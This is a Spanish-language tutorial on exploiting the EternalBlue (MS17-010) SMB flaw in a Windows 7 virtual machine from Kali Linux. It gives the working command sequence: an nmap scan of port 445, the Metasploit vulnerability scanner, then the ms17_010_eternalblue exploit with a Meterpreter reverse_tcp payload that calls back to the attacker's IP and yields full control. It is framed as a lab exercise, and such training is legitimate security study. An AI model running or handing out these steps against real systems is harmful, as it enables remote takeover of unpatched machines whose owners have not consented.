Si después de conseguir vulnerar Windows 7 conocéis a alguien que todavía use este sistema operativo, corred a avisarle para que actualice rápidamente su windows a una versión mas reciente.
Para este tutorial necesitamos dos máquinas:
Una máquina con Windows 7 (Máquina víctima)
Una máquina con Kali Linux (Máquina atacante)
El cómo tengáis dichas máquinas es indiferente, pero os pongo ejemplos de como pódeis tener las dos:
Un PC con windows 10 u 11, y dos máquinas virtuales corriendo simultáneamente, una con Kali Linux y otra con Windows 7
Un PC con Kali Linux y una máquina virtual de windows 7
Un PC con cualquier otra distribución de Linux y dos máquinas virtuales corriendo simultáneamente, una con Kali Linux y otra con Windows 7
Un Mac y dos máquinas virtuales corriendo simultáneamente, una con Kali Linux y otra con Windows 7… etc
Para empezar, ejecutamos nuestra máquina virtual con Windows 7 y miramos que ip tiene.
Para ello, lanzamos el cmd (tecla windows y buscamos “cmd”) y escribimos ipconfig
Ahora desde nuestro Kali, seguiremos estos pasos:
Escanear si el puerto de SMB está abierto
Lo primero que tenemos que hacer es ver si el puerto de SMB está abierto:Lanzamos un nmap para comprobar que tiene el puerto 445 abierto con: (hay que susituir las 3 x por la ip del windows)
nmap -T4 -O 192.168.10.xxx
Esto nos dará entre otros datos si el puerto de SMB está activo o no. Si está activo nos dará una salida similar a esta:
Escanear si el equipo es vulnerable
Una vez hemos visto que el puerto está abierto, veremos si además es vulnerable.
En la terminal abrimos metasploit con el comando que te pongo a continuación.
msfconsole -q
Sabremos que hemos entrado en metasploit porque en vez de mostrar la linea de comandos normal, pondrá msf6 > como se ve en la imagen:
Dentro de metasploit, buscamos el exploit que explota esta vulnerabilidad, que se llama eternalblue. Para ello ejecutaremos el comando
search eternal
y nos aparecerá algo así:
Ahora ponemos el comando que activa el escaner para saber si el equipo es vulnerable o no:
use auxiliary/scanner/smb/smb_ms17_010
En el siguiente paso tenemos que elegir el host al que vamos a atacar. En este caso la maquina de windows 7 vulnerable tiene la dirección IP 192.168.1.124 y es la que sacamos en el paso anterior en la máquina de Windows 7 con ipconfig.
Para elegir el host remoto lo hacemos con el comando:
set RHOSTS 192.168.1.124
Recuerda que todos los pasos los estamos haciendo en KALI LINUX
Si ahora ejecutamos el exploit nos dirá si el equipo es vulnerable o no. Lo ejecutamos con el comando:
exploit
Solo nos dirá si es vulnerable ya que elegimos el exploit que era un escaner: auxiliary/scanner/smb/smb_ms17_010 Sabremos si es vulnerable si obtenemos este mensaje:
Si nos ha dado que es vulnerable, pasaremos al siguiente paso.
Explotar la vulnerabilidad
Ahora tenemos que seleccionar otro exploit: el que va a explotar la vulnerabilidad.
Para ello volvemos hacia atras para poder salir del auxiliary/scanner Lo hacemos con el comando: back
Y ahora seleccionamos el exploit eternalblue. Lo seleccionamos con:
use exploit/windows/smb/ms17_010_eternalblue
Volveremos a elegir el HOST al que vamos a atacar:
set RHOSTS 192.168.1.124
y elegimos que payload usaremos después de explotar la vulnerabilidad con:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Colocamos nuestra ip (la de nuestra máquina con Kali) con: set LHOST 192.168.1.35
y lanzamos el exploit con:
exploit -j
Una vez hecho esto, tendrás acceso total a windows 7